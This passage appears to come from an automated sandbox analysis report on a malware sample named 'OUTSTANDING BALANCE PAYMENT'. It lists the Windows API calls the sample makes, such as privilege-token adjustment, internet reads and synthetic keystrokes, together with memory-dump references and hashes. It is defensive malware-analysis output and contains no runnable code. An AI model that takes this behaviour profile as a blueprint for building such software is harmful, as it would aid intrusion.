                                                          • GetProcAddress.KERNEL32(00000000,GetNativeSystemInfo), ref: 00B7E03E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AddressLibraryLoadProc
                                                          • String ID: GetNativeSystemInfo$kernel32.dll
                                                          • API String ID: 2574300362-192647395
                                                          • Opcode ID: ca6a4a7253bffc1542939d652d4bb23c7fed61aeeec8928136cefdd8ffa9d59b
                                                          • Instruction ID: 854853465db5c15f9b1f300953951412f2399fdd963a79fc05e0611b5ad9185a
                                                          • Opcode Fuzzy Hash: ca6a4a7253bffc1542939d652d4bb23c7fed61aeeec8928136cefdd8ffa9d59b
                                                          • Instruction Fuzzy Hash: AED09E745007129ED7215B65E84975276E4EF06711F1884A9E4A5A2150DAF4D8808661
                                                          APIs
                                                          • lstrlenW.KERNEL32(?,?,?,00000000), ref: 00BA13DC
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: lstrlen
                                                          • String ID: ($|
                                                          • API String ID: 1659193697-1631851259
                                                          • Opcode ID: 032609633cabe75509f5b0cdad3b0a48baac04a01aa458341e9f79d549908550
                                                          • Instruction ID: 51c0389857ebd390a6f869d6cf86f1f6b52eedb8f7d2c7f214d74bf027121b1d
                                                          • Opcode Fuzzy Hash: 032609633cabe75509f5b0cdad3b0a48baac04a01aa458341e9f79d549908550
                                                          • Instruction Fuzzy Hash: D5321475A046059FCB68CF6DC48096AB7F0FF49320B15C9AEE49ADB3A1E770E941CB44
                                                          APIs
                                                            • Part of subcall function 00B7B34E: GetWindowLongW.USER32(?,000000EB), ref: 00B7B35F
                                                          • DefDlgProcW.USER32(?,?,?,?,?), ref: 00B7B22F
                                                            • Part of subcall function 00B7B55D: DefDlgProcW.USER32(?,00000020,?,00000000), ref: 00B7B5A5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Proc$LongWindow
                                                          • String ID:
                                                          • API String ID: 2749884682-0
                                                          • Opcode ID: 997278147d99cfeb8955a683d7f3373a5450cb0cb22ba8dd5f07ec9b732fb3cf
                                                          • Instruction ID: 138a211812c2d65562acd21c73e7a9a970ab1033b0ad754ae93b2538e313b898
                                                          • Opcode Fuzzy Hash: 997278147d99cfeb8955a683d7f3373a5450cb0cb22ba8dd5f07ec9b732fb3cf
                                                          • Instruction Fuzzy Hash: ADA16760115005BADB287B295CC8FBF6DDDEB55344B14C1DEF83ADA682EB14DC01DA72
                                                          APIs
                                                          • InternetQueryDataAvailable.WININET(?,?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,00BB43BF,00000000), ref: 00BB4FA6
                                                          • InternetReadFile.WININET(00000001,00000000,00000001,00000001), ref: 00BB4FD2
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Internet$AvailableDataFileQueryRead
                                                          • String ID:
                                                          • API String ID: 599397726-0
                                                          • Opcode ID: 45ba1e0ab6fa5278d3b2b2335af9c6ad7d8d109139e1a9f01f9d7596bae8d6e0
                                                          • Instruction ID: b047379f32bd4fd1707ae150415373af4fa00615515e7a6202a956ea66fe4fee
                                                          • Opcode Fuzzy Hash: 45ba1e0ab6fa5278d3b2b2335af9c6ad7d8d109139e1a9f01f9d7596bae8d6e0
                                                          • Instruction Fuzzy Hash: 1141B171504609BFEB219A84D881FFF77ECFB40754F1040AAF609A7182DBF19E4196A0
                                                          APIs
                                                          • SetErrorMode.KERNEL32(00000001), ref: 00BAE20D
                                                          • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00BAE267
                                                          • SetErrorMode.KERNEL32(00000000,00000001,00000000), ref: 00BAE2B4
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ErrorMode$DiskFreeSpace
                                                          • String ID:
                                                          • API String ID: 1682464887-0
                                                          • Opcode ID: 36c54a48ee947a7d5ff9be6fedb8ddd77232bc47a208de40cc542404d10501e8
                                                          • Instruction ID: 93f0a2793f807f1a1f270af77677abf370d986b6428c16e8a05f879ea2ea0db4
                                                          • Opcode Fuzzy Hash: 36c54a48ee947a7d5ff9be6fedb8ddd77232bc47a208de40cc542404d10501e8
                                                          • Instruction Fuzzy Hash: 10213A75A00218EFDB00EFA5D885AADBBF8FF49310F0484A9E945AB351DB31D905CB50
                                                          APIs
                                                            • Part of subcall function 00B7F4EA: std::exception::exception.LIBCMT ref: 00B7F51E
                                                            • Part of subcall function 00B7F4EA: __CxxThrowException@8.LIBCMT ref: 00B7F533
                                                          • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00B9B180
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00B9B1AD
                                                          • GetLastError.KERNEL32 ref: 00B9B1BA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AdjustErrorException@8LastLookupPrivilegePrivilegesThrowTokenValuestd::exception::exception
                                                          • String ID:
                                                          • API String ID: 1922334811-0
                                                          • Opcode ID: 7443db59c9836d40a5f4dcdbff543919b4d116f2d603c506e051521647d65a73
                                                          • Instruction ID: 3ea0d817aadf95b28d2322a69ec609338a11f4188f8d68bf4df9de6d33438728
                                                          • Opcode Fuzzy Hash: 7443db59c9836d40a5f4dcdbff543919b4d116f2d603c506e051521647d65a73
                                                          • Instruction Fuzzy Hash: D611CEB2410205AFE718AF64EDC5D2BB7FDFF44310B20856EE05AA7241DBB0FC418A64
                                                          APIs
                                                          • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00BA66AF
                                                          • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,0000000C,?,00000000), ref: 00BA66EC
                                                          • CloseHandle.KERNEL32(00000000,?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 00BA66F5
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: CloseControlCreateDeviceFileHandle
                                                          • String ID:
                                                          • API String ID: 33631002-0
                                                          • Opcode ID: dfd9c881b46fb977f32bd3c364bd90de128068ec9ab2b2f6d6cdda113d61f1df
                                                          • Instruction ID: f3475b6f9ec052da5f2d03d8c044c4f062930cd58a70fa18b1dc0fe5c89c0818
                                                          • Opcode Fuzzy Hash: dfd9c881b46fb977f32bd3c364bd90de128068ec9ab2b2f6d6cdda113d61f1df
                                                          • Instruction Fuzzy Hash: 6311A1B2D11228BEE7118BA8DC85FAFBBFCEB09714F004596F901E7190C2B49E0487A5
                                                          APIs
                                                          • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 00BA7223
                                                          • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 00BA723A
                                                          • FreeSid.ADVAPI32(?), ref: 00BA724A
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AllocateCheckFreeInitializeMembershipToken
                                                          • String ID:
                                                          • API String ID: 3429775523-0
                                                          • Opcode ID: 5e485ce7cdf5b0877f3c6225645491e358f48475345bb660843d0f0a77b8665d
                                                          • Instruction ID: 480f40cafe683d4a141c1c62c6eaa4ff95de28c1b4114b9593fa389816a65f70
                                                          • Opcode Fuzzy Hash: 5e485ce7cdf5b0877f3c6225645491e358f48475345bb660843d0f0a77b8665d
                                                          • Instruction Fuzzy Hash: 3DF01D76A44309BFDF04DFE4DD99AEEBBBCEF08301F104469A612E7591E6749A448B10
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 00BAF599
                                                          • FindClose.KERNEL32(00000000), ref: 00BAF5C9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Find$CloseFileFirst
                                                          • String ID:
                                                          • API String ID: 2295610775-0
                                                          • Opcode ID: e3b1b9a368d6f1d87851da05c017228be88d3acc0fe313705b575a42a7bb6503
                                                          • Instruction ID: 2627d1b1802f562a1632b65609418bf3399012fd680e5cde35c23426b764c7c0
                                                          • Opcode Fuzzy Hash: e3b1b9a368d6f1d87851da05c017228be88d3acc0fe313705b575a42a7bb6503
                                                          • Instruction Fuzzy Hash: CC11C4316042009FDB10EF68D885A2EB7E9FF95324F00895EF8A9DB391CF70AD018B81
                                                          APIs
                                                          • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,00000016,?,00BBBE6A,?,?,00000000,?), ref: 00BACEA7
                                                          • FormatMessageW.KERNEL32(00001000,00000000,000000FF,00000000,?,00000FFF,00000000,00000016,?,00BBBE6A,?,?,00000000,?), ref: 00BACEB9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ErrorFormatLastMessage
                                                          • String ID:
                                                          • API String ID: 3479602957-0
                                                          • Opcode ID: 69e430145dfbf61508511a4d0b1f75df574b680cef7f6dc0c4e6db2ab8ee0468
                                                          • Instruction ID: edca591faabf0cd9cd69384c35e25fc634423718cf3738900e646ebe2b10b86a
                                                          • Opcode Fuzzy Hash: 69e430145dfbf61508511a4d0b1f75df574b680cef7f6dc0c4e6db2ab8ee0468
                                                          • Instruction Fuzzy Hash: 17F08231104229EBDB10ABA4DC89FFA77ADFF09351F0081A5F915D6191D670AA40CBA1
                                                          APIs
                                                          • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 00BA4153
                                                          • keybd_event.USER32(?,75A8C0D0,?,00000000), ref: 00BA4166
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: InputSendkeybd_event
                                                          • String ID:
                                                          • API String ID: 3536248340-0
                                                          • Opcode ID: 60016db24eb7f0c88eec20b3bcf2beadd1401ddfa856fa50b5e7a88210d56101
                                                          • Instruction ID: 7160300bc763a0794f5d7a13b954d9de730ebfbb2d4d1c48b460c2fc0bcfa8d6
                                                          • Opcode Fuzzy Hash: 60016db24eb7f0c88eec20b3bcf2beadd1401ddfa856fa50b5e7a88210d56101
                                                          • Instruction Fuzzy Hash: F9F06D7080438DAFDB058FA0C845BBE7FB0EF10305F008449F965AA191D7B986129FA0
                                                          APIs
                                                          • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00B9ACC0), ref: 00B9AB99
                                                          • CloseHandle.KERNEL32(?,?,00B9ACC0), ref: 00B9ABAB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: AdjustCloseHandlePrivilegesToken
                                                          • String ID:
                                                          • API String ID: 81990902-0
                                                          • Opcode ID: 96516b9b5b361caeba1b579ca9bec42d76ffa090c8205b4dc5ac9234463e9687
                                                          • Instruction ID: 4e475b3aa6a30ed4b92ece451cb173dc8048360d23c872c4384c35f6b11070d3
                                                          • Opcode Fuzzy Hash: 96516b9b5b361caeba1b579ca9bec42d76ffa090c8205b4dc5ac9234463e9687
                                                          • Instruction Fuzzy Hash: 63E0E671000511AFE7252F54EC05D7777EAEF04321710C869F45A86471DB625C90DB55
                                                          APIs
                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,0000000E,00B86DB3,-0000031A,?,?,00000001), ref: 00B881B1
                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 00B881BA
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: ExceptionFilterUnhandled
                                                          • String ID:
                                                          • API String ID: 3192549508-0
                                                          • Opcode ID: 95adf92edb19c2a8b379b3c0d4d08007d11ecf28dad3dc544917c4d79c6d37be
                                                          • Instruction ID: 208007718896f0c6e15a22a7691d5d1c82d2783f56084b235d6dfa45ffefebba
                                                          • Opcode Fuzzy Hash: 95adf92edb19c2a8b379b3c0d4d08007d11ecf28dad3dc544917c4d79c6d37be
                                                          • Instruction Fuzzy Hash: 1FB09232144648ABDB002BA1EC49B597F68EB08652F004010F60D4A0A18FB354108A9A
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: d99c5cfdd03591a8029450e62a433dc952f61944dd66c884dc7c0b8efc7775ea
                                                          • Instruction ID: ac43ffdc99d72e9f15f08067a4177806c965d37cd014e21e4dce649980b5efd0
                                                          • Opcode Fuzzy Hash: d99c5cfdd03591a8029450e62a433dc952f61944dd66c884dc7c0b8efc7775ea
                                                          • Instruction Fuzzy Hash: D7A23971A04259CFDB24CF59C4806ADBBF1FF48314F2581AAE859AB391DB349E81DF90
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: Exception@8Throwstd::exception::exception
                                                          • String ID: @
                                                          • API String ID: 3728558374-2766056989
                                                          • Opcode ID: b084bd78a0bd2e4fd17385fd4a4d5a3479e4db9f22ba8877ce27fbd49d538259
                                                          • Instruction ID: 285d465436c9fd9a6c8319dfc7ba772e3f8e8ae0371f2e2d1c650c41ce978b0c
                                                          • Opcode Fuzzy Hash: b084bd78a0bd2e4fd17385fd4a4d5a3479e4db9f22ba8877ce27fbd49d538259
                                                          • Instruction Fuzzy Hash: 0672AF70E042099FCB24DF58C481ABEB7F5EF48700F14C09AE929AB351EB75AE45DB91
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: 231d44a031892fb3364d8ddfa6272c1d5d32db532411165b9b4af6db6516803f
                                                          • Instruction ID: 83c499c2e4b56d168345e0fc395484b66e31d293eabd415474c9a9cdf41e8b47
                                                          • Opcode Fuzzy Hash: 231d44a031892fb3364d8ddfa6272c1d5d32db532411165b9b4af6db6516803f
                                                          • Instruction Fuzzy Hash: 7F320621D29F414DD7236634C862335A399EFB73D4F15D767E819B69A6EF29C8838200
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID: __itow__swprintf
                                                          • String ID:
                                                          • API String ID: 674341424-0
                                                          • Opcode ID: 44606fa1b4923c0977f5f6dc17e49c9b79db2d1be5e117f185281dee47053a87
                                                          • Instruction ID: 14edc63126d442152b5a8e8eb54e225290a66d1f4195761d65a8bd4ad9b13e00
                                                          • Opcode Fuzzy Hash: 44606fa1b4923c0977f5f6dc17e49c9b79db2d1be5e117f185281dee47053a87
                                                          • Instruction Fuzzy Hash: 6F229C716083019FD724DF14C891B6FBBE8EF84710F1449AEF89A97291EB75E944CB82
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.2034796178.0000000000B61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00B60000, based on PE: true
                                                          • Associated: 00000000.00000002.2034782676.0000000000B60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000BED000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034835549.0000000000C0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034868798.0000000000C1A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.2034881591.0000000000C24000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_b60000_OUTSTANDING BALANCE PAYMENT.jbxd
                                                          Similarity
                                                          • API ID:
                                                          • String ID:
                                                          • API String ID:
                                                          • Opcode ID: fabd2fd8d1d9b8c520cd669a8d99f6973b46eef8726b25f4e3256487fdc33906
                                                          • Instruction ID: 6e4a161a123a45838dc849a32fb444bfa80051a33c41d5dbb2fd764b1873cd97
                                                          • Opcode Fuzzy Hash: fabd2fd8d1d9b8c520cd669a8d99f6973b46eef8726b25f4e3256487fdc33906
                                                          • Instruction Fuzzy Hash: 61B1D320D2AF414DD62396398871336BA9CAFBB2D5F92D717FD1676D22EF2185838180
                                                          APIs
                                                          • __time64.LIBCMT ref: 00BAB6DF
